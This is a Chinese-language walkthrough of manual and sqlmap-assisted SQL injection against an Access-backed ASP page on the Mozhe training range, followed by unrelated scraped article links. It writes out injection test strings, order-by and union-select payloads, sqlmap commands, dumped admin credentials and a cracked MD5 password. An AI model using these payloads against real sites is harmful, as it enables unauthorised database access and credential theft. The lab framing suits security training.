前言:在进行注入之前我们需要了解access数据库的特征,access数据库比较特殊:其结构与mysql ,mssql,MongoDB,postgresql,sqlit等数据不通。区别在与access数据库的接口是:表--列--数据  而其他数据库是:数据库--表--列--数据。并且access数据库没有记录所有表名和列名的表,也就意味着我们需要依靠字典进行猜解表名和列名。了解到这里那么我们就可以开始进行实施注入了。

实验背景:我这里使用的是mozhe靶场进行演示(墨者学院_专注于网络安全人才培养)首页> 在线靶场> SQL注入> SQL手工注入漏洞测试(Access数据库)

1.判断页面是否有注入点

打开靶场环境我们看到url是:http://219.153.49.228:44574/new_list.asp?id=1

http://219.153.49.228:44574/new_list.asp?id=1 and 1=1

http://219.153.49.228:44574/new_list.asp?id=1 and 1=2

进行测试,判断出来这个页面存在注入点。

2.判断数据库类型

这里我们可以借助sqlmap工具判断数据库类型

python sqlmap.py -u "http://219.153.49.228:44574/new_list.asp?id=1"

通过sqlmap工具判断出数据库版本类型是Access,可能是因为是access的原因没有判断出来具体的列,所以我们需要结合手工的方式进行判断

3.判断列名数量

http://219.153.49.228:44574/new_list.asp?id=1%20order%20by%204#

http://219.153.49.228:44574/new_list.asp?id=1%20order%20by%205#

所以注入点的列名数量为4

4.猜解表名

python sqlmap.py -u "http://219.153.49.228:44574/new_list.asp?id=1" –tables

我们可以从猜解的日志中查看到有两张表  admin和news这两张。

5.猜解列名

python sqlmap.py -u "http://219.153.49.228:44574/new_list.asp?id=1" -T"admin" –columns

猜解结果:

6.获取账号密码

继续使用手工注入的方式

在浏览器输入:

http://219.153.49.228:44574/new_list.asp?id=-1%20union%20select%201,username,passwd,4%20from%20admin

所以:

username: moke

passwd:7e6ec4fadf84938f

7.MD5解密

md5解密得到:27737201

所以得到:

用户名:moke

密码:27737201

8.总结

首先我们在得到注入点后,一定要先判断数据库类型,再进行注入,可以结合手工和工具的方式一起进行注入,并且我们要了解注入点数据库的特点以及注入数据的类型。

ACCESS数据库注入解析相关推荐

  1. 网络安全学习--008--SQL注入之Access数据库注入详解

    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 Access注入漏洞详解 一:注入漏洞分析 站库分类: 1.网站分类: 静态网页: 不依赖数据库 灵活性差,制作.更新.维护麻烦 交互 ...

  2. WEB渗透SQL注入【3】[access数据库注入](2)

    SQL注入的分类很多,不同的人也会将注入分成不同的种类,下面笔者将介绍一下常见的分类. 注意:此文章中标点符号在页面中显示可能会转成中文的,自己测试时候语句中的标点一律使用英文输入法状态下的. 1.判 ...

  3. Access数据库注入

    目录 Access数据库 Access数据库中的函数 盲注Access数据库 Sqlmap注入Access数据库 Access数据库 Microsoft Office Access是由微软发布的关系数 ...

  4. Access数据库注入之偏移注入

    文章目录 一.偏移注入使用场景 二.必要的SQL知识补充 (一)admin.*是什么意思? (二)联合查询的字段数问题 (三)access如何查询指定数据? 三.靶场实战 (一)判断是否存在cooki ...

  5. 【CyberSecurityLearning 60】ACCESS数据库的注入+ACCESS数据库的cookie注入

    目录 ACCESS注入 雷驰新闻系统v1.0环境搭建: ACCESS数据库注入演示1: 雷驰新闻系统v3.0环境搭建: cookie注入演示2: ACCESS数据库注入用sqlmap怎么做?演示: A ...

  6. Python解析access数据库(mdb文件或者accdb文件)

    在工作中遇到这样一个问题,需要对上百个mdb文件进行数据统计,mdb文件实际上就是access数据库,使用微软的access工具即可打开. 但是我电脑上没有安装access数据库,而且官方的安装包还要 ...

  7. Access数据库偏移注入

    前言 本来想好好介绍一下Access数据库的偏移注入,找个目标来试试,但是找了好久都没有找到,又想自己要不在本地搭建一个?额...还是算了吧,没有太多的时间,之后在网上搜索了一些"偏移注入& ...

  8. 15、Access数据库偏移注入

    前言 本来想好好介绍一下Access数据库的偏移注入,找个目标来试试,但是找了好久都没有找到,又想自己要不在本地搭建一个?额...还是算了吧,没有太多的时间,之后在网上搜索了一些"偏移注入& ...

  9. Access数据库——Cookie注入

    目录 1.Cookie注入 什么是Cookie? Cookie注入简介 Cookie和注入有什么关系? Cookie的核心 2.如何设置Cookie? 方法一:依靠浏览器进行设置 方法二:抓包直接修改 ...

  10. Access数据库手工注入

    ACCESS数据库手工注入 access数据库 是一种非常简单但是功能完整的数据库,很适合小型网站创建,可以很轻松管理表和列,有很多管理工具. access数据库结构? access数据库是这么个结构 ...

最新文章

  1. 图文解读助你理解和使用正则表达式
  2. 通过LDB_PROCESS函数使用逻辑数据库
  3. 从零点五开始用Unity做半个2D战棋小游戏(八)
  4. Python 实例方法,类方法和静态方法的区别
  5. SAP License:ERP概述
  6. 一句公道话引发的......
  7. 如何计算机械能的变化量,问:如何计算机械能变化量?
  8. windows配置pip加速器
  9. 字符集 (ASCII、GBK、UTF-8、编码方案,解码方案、乱码等问题)
  10. 如何用程序实现“rescan windows device manager
  11. 常见的统计图表及其应用
  12. 从“游击队”到“正规军”:虾神成长史
  13. neko vm 数据包装翻译
  14. GPS卫星定位接收器的NMEA协议解析
  15. Codeforces - Cashback
  16. SVA——断言属性之序列(sequence与property的用法)
  17. CNN卷积神经网络 ILSVRC-2012
  18. BZOJ 2303: [Apio2011]方格染色 [并查集 数学!]
  19. Docker下/var/lib/docker/overlay2空间清理办法
  20. 基于JAVA成人自考信息与推荐系统录屏计算机毕业设计源码+系统+lw文档+部署

热门文章

  1. java下载 安卓版_java教程手机版-java宝典安卓版下载2.0 官方版-西西软件下载
  2. c语言程序设计题怎么写,C语言程序设计题库1(最新整理)
  3. 大型网站应用之海量数据和高并发解决方案总结一二
  4. 对《Java编程思想》读者的一点建议
  5. 计算机网络:数据通信的主要技术指标
  6. 高清成主流 十大最受用户关注摄像头
  7. Java-----exe
  8. 【读书笔记《Android游戏编程之从零开始》】19.游戏开发基础(游戏音乐与音效)
  9. 【C语言】简单小游戏项目:《别踩白块儿》
  10. 小甲鱼零基础入门python课后作业及答案_小甲鱼python视频第四讲(笔记及课后习题答案)...